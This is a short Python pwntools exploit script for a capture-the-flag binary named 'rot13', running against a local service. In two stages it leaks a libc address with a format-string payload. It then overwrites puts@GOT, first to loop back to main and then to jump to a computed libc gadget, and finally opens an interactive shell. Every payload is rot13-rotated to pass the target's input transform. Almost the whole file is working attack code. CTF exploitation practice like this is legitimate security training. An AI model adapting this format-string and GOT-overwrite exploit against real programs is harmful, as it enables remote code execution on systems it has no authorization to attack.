from pwn import *
import codecs

# Two-stage format-string exploit script for the "rot13" challenge binary.
# Stage 1 leaks a stack value and redirects puts@GOT back to main so the
# program loops; stage 2 uses the leak to overwrite puts@GOT a second time.
# Every payload is pre-rotated with rot13 — presumably the target applies
# rot13 to its input before it reaches printf (inferred from the name;
# confirm against the binary).
elf = ELF('rot13')
context.binary = elf
s = remote('localhost', 10004)


def rot13(s):
    """Return *s* (bytes) with its letters rot13-rotated, other bytes untouched.

    Note: the parameter shadows the module-level socket ``s`` inside this
    function; it refers to the payload bytes here, not the connection.
    """
    # latin-1 is a byte-transparent codec, so non-ASCII payload bytes
    # round-trip unchanged; rot13 only touches A-Z/a-z.
    text = s.decode('latin-1')
    rotated = codecs.encode(text, 'rot13')
    return rotated.encode('latin-1')


# Stage 1: "%43$016lx" prints the 43rd stack argument as a zero-padded
# 16-digit hex string (presumably a libc address — TODO confirm), followed by
# 7 underscores.  The fmtstr write that follows is told how many bytes were
# already emitted (16 hex digits + 7 underscores) so its %n counters line up.
leak_fmt = b'%43$016lx_______'
stage1 = leak_fmt + fmtstr.fmtstr_payload(
    offset=10,
    writes={elf.got.puts: elf.symbols.main},
    numbwritten=16 + 7,
)
s.sendline(rot13(stage1))

# Parse the 16 hex digits printed by the leak format above.
# NOTE(review): recv(16) may return fewer than 16 bytes on a short read,
# in which case the parsed value would be truncated.
leak = s.recv(16)
start_main = int(leak, 16)

# The two constants are libc-build-specific offsets hard-coded for the
# challenge's libc (not verifiable from this file alone).
rce = start_main - 0x270b3 + 0xe6af1

# Stage 2: now that main has been re-entered, overwrite puts@GOT again with
# the computed libc address.  The argument offset differs from stage 1.
stage2 = fmtstr.fmtstr_payload(
    offset=8,
    writes={elf.got.puts: rce},
)
s.sendline(rot13(stage2))
s.interactive()